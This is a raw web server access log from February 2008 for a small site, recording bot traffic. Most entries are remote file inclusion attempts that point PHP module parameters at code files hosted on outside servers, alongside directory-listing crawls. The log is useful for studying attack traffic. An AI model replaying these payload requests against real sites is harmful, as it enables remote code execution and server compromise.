75.0.141.110 - - [03/Feb/2008:17:25:36 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:17:25:41 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:28:36 -0800] "GET /logs/access_080107.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.243.244.50 - - [03/Feb/2008:17:28:47 -0800] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
81.169.174.238 - - [03/Feb/2008:17:30:45 -0800] "GET //modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:17:31:13 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:17:31:18 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:17:31:50 -0800] "GET /logs/access_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:32:13 -0800] "GET /logs/access.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:32:18 -0800] "GET //index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:32:20 -0800] "GET /logs//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:33:05 -0800] "GET /logs/access_080114.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.huerzeler-reisen.ch/help/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:33:05 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.huerzeler-reisen.ch/help/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:33:05 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.huerzeler-reisen.ch/help/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:17:34:09 -0800] "GET /logs/access_071105.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.53.69.10 - - [03/Feb/2008:17:34:51 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:36:39 -0800] "GET /logs/access.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:36:40 -0800] "GET //index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:36:43 -0800] "GET /logs//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:37:01 -0800] "GET /logs/access.log/view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:37:02 -0800] "GET /view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:17:37:02 -0800] "GET /logs/view.php?table=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:37:49 -0800] "GET /logs/access.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:37:56 -0800] "GET //index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:38:00 -0800] "GET /logs//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
125.46.36.186 - - [03/Feb/2008:17:38:06 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:40:11 -0800] "GET /logs/access_071224.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:40:11 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:40:12 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:40:36 -0800] "GET /logs/access_080114.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:40:59 -0800] "GET /logs/access_071217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:17:40:59 -0800] "GET /logs/access_080114.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
194.186.47.24 - - [03/Feb/2008:17:41:15 -0800] "GET //spamx/IPofUrl.Examine.class.php?_CONF[path]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
194.186.47.24 - - [03/Feb/2008:17:41:15 -0800] "GET /spamx/MTBlackList.Examine.class.php?_CONF[path]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:44:23 -0800] "GET /logs/access_071224.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:44:23 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:44:23 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.232.200.122 - - [03/Feb/2008:17:44:40 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.232.200.122 - - [03/Feb/2008:17:44:40 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.232.200.122 - - [03/Feb/2008:17:44:40 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.174.65.77 - - [03/Feb/2008:17:45:20 -0800] "GET /logs/access_071126.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.174.65.77 - - [03/Feb/2008:17:45:21 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.174.65.77 - - [03/Feb/2008:17:45:21 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:46:43 -0800] "GET /logs/access_071119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.169.187.243 - - [03/Feb/2008:17:47:00 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:39 -0800] "GET / HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:40 -0800] "GET /?D=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:40 -0800] "GET /?D=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:40 -0800] "GET /?D=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:40 -0800] "GET /?S=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:40 -0800] "GET /?S=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fpunotag%2Fufacip%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:41 -0800] "GET /?S=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:41 -0800] "GET /?M=http%3A%2F%2Fwww.spoddyland.co.uk%2Fscans%2Fyouneedtoselectaplanettoclaimbeforegettinginhere%2Fscanlogs%2Fiwazex%2Fatepec%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:41 -0800] "GET /?M=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:41 -0800] "GET /?M=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fpunotag%2Fufacip%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:42 -0800] "GET /?N=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:42 -0800] "GET /?N=http%3A%2F%2Frabotnitsa.ru%2Fjoomla%2Fadministrator%2Fincludes%2Fgosa%2Fyiw%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:42 -0800] "GET /?N=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:42 -0800] "GET /?D=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:42 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:43 -0800] "GET /?S=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:43 -0800] "GET /?M=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:43 -0800] "GET /?N=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:43 -0800] "GET /logs/ HTTP/1.0" 200 3353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:44 -0800] "GET /sitebuilder/ HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:44 -0800] "GET /?N=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:44 -0800] "GET /?D=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:44 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:45 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:45 -0800] "GET /?S=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:45 -0800] "GET /?M=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:45 -0800] "GET /logs/?S=A HTTP/1.0" 200 3353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:46 -0800] "GET /logs/access_080127.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:46 -0800] "GET /sitebuilder/?D=A HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:47 -0800] "GET /sitebuilder/?M=A HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:47 -0800] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:47 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:47 -0800] "GET /logs/?S=D HTTP/1.0" 200 3353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:48 -0800] "GET /sitebuilder/?N=A HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
168.255.106.142 - - [03/Feb/2008:17:47:48 -0800] "GET /sitebuilder/?M=D HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:17:48:31 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:17:48:31 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:17:48:31 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:17:48:31 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:49:37 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:49:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:49:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:51:06 -0800] "GET /logs/access_071217.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:51:07 -0800] "GET /modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:51:07 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
194.186.47.24 - - [03/Feb/2008:17:51:41 -0800] "GET //modules/admin/vw_usr_roles.php?baseDir=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:52:03 -0800] "GET /logs/access_071224.log/?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:52:03 -0800] "GET /?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 200 919 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:52:03 -0800] "GET /logs/?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 200 3369 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.19.225.162 - - [03/Feb/2008:17:52:42 -0800] "GET /logs/access_071217.log/?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.169.174.238 - - [03/Feb/2008:17:52:52 -0800] "GET /index.php?page=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
81.169.174.238 - - [03/Feb/2008:17:52:53 -0800] "GET /logs/index.php?page=http://www.greytauctions.org/panji_tengkorak/scrol.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:17:53:06 -0800] "GET //appserv/main.php?appserv_root=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:17:53:06 -0800] "GET //appserv/main.php?appserv_root=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:17:53:53 -0800] "GET /logs/access_071119.log/modules/My_eGallery/index.php?basepath=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.205.241.52 - - [03/Feb/2008:17:54:18 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
195.205.241.52 - - [03/Feb/2008:17:54:18 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
80.53.69.10 - - [03/Feb/2008:17:56:58 -0800] "GET /logs/access_071126.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
